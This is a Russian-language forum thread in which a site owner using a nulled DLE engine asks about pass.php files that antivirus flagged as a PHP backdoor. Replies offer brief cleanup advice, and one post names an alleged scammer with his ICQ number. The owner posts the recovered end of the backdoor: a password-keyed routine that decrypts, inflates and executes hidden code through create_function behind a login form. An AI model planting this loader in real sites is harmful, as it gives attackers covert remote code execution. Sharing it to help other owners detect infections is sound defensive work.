Форум Сайтостроение Безопасность

Появился pass.php в DLE - Php-BackDoor BX

V
На сайте с 02.08.2011
Offline
50
Vadimts
1546

Случайно антивирус запищал на бекап моего сайта на компьютере, на 2 файла

сайт.ру/pass.php

сайт.ру/engine/pass.php

Выдал, что это Php-BackDoor BX. Естестсвенно, файлы я эти не заливал. К сожалению код не успел скопировать, антивирус удалил эти файлы, а я с фтп, перепугавшись тоже.

Но там было что-то такого вида <?php $wp_fksdjgklsdgjklsdjgkldsjgjsdlgksdklgjsdlk (около 3500 символов зашифрованного текста такого) и в конце <form post ....>

Кто может навести хотя бы меня на то, что делали эти файлы на моем сайте, как обезопаситься и я как понял такие файлы могут быть не только у меня в DLE, а массово.

p.s - нуллед версия, до этого (10 месяцев) проблем не было.

web-developer
На сайте с 24.11.2014
Offline
15
web-developer
#1

Скорее всего обработчик, есть предположение что злоумышленники вставляли <input type="file"> в исходный код, и обрабатывали его через вышеупомянутый файл.

V
На сайте с 02.08.2011
Offline
50
Vadimts
#2

Опасен ли он и если я его удалил с фтп, может ли он снова появиться?

p.s немного оффтопа: Добавился Алексей Фролов 674508166 с услугами "вылечу ваш сайт, только заплатите". Кинул ссылку на популярный топик на серче. Там другая аська в топике, вбил 674508166 в Яндекс - выдал, что чел кидала. Не сотрудничайте с ним и лучше даже не добавляйте!

Семантическое чудо-ядро. Недорого и Насколько это опасно ? 123cash - файловый поисковик
SeVlad
На сайте с 03.11.2008
Offline
1609
SeVlad
#3
Vadimts:
как обезопаситься ..

p.s - нуллед версия,

Смешно :)

В разделе закреплён топик - почему не читал?

Vadimts:
может ли он снова появиться?

появится.

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.
дани мапов
На сайте с 06.09.2012
Offline
204
дани мапов
#4
Vadimts:
Опасен ли он и если я его удалил с фтп, может ли он снова появиться?

Конечно может появиться, хотя бы обновите движок до актуальной версии.

Написание и доработка скриптов (PHP, MySQL, JavaScript, jQuery) (/ru/forum/811046)
RAS
На сайте с 27.11.2005
Offline
126
RAS
#5

Надо лечиться, если он появился, то еще явно есть вставки.

Администрируем сервера, впс, вдс. Ускоряем загрузку сайтов - DLE, Word Press, Joomla, Modx... Настраиваем безопасность. Ручная чистка rootkit/malware/вирусов. (/ru/forum/867860) Разработка - shell/bash/sh/python/perl.
V
На сайте с 02.08.2011
Offline
50
Vadimts
#6

восстановил файл, в конце такой код

'));$wp_wp=isset($_POST['wp_wp'])?$_POST['wp_wp']:(isset($_COOKIE['wp_wp'])?$_COOKIE['wp_wp']:NULL);if($wp_wp!==NULL){$wp_wp=md5($wp_wp).substr(md5(strrev($wp_wp)),0,strlen($wp_wp));for($wp___wp=0;$wp___wp<15324;$wp___wp++){$wp__wp[$wp___wp]=chr(( ord($wp__wp[$wp___wp])-ord($wp_wp[$wp___wp]))%256);$wp_wp.=$wp__wp[$wp___wp];}if($wp__wp=@gzinflate($wp__wp)){if(isset($_POST['wp_wp']))@setcookie('wp_wp', $_POST['wp_wp']);$wp___wp=create_function('',$wp__wp);unset($wp__wp,$wp_wp);$wp___wp();}}?><form action="" method="post"><input type="text" name="wp_wp" value=""/><input type="submit" value="&gt;"/></form>

Владельцам нулл. DLE - проверяйте тоже...

SeVlad
На сайте с 03.11.2008
Offline
1609
SeVlad
#7
Vadimts:
немного оффтопа: Добавился Алексей Фролов 674508166 с услугами "вылечу ваш сайт, только заплатите". Кинул ссылку на популярный топик на серче. Там другая аська в топике, вбил 674508166 в Яндекс - выдал, что чел кидала. Не сотрудничайте с ним и лучше даже не добавляйте!

Это распространённый способ кидалова - представятся другой личностью.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий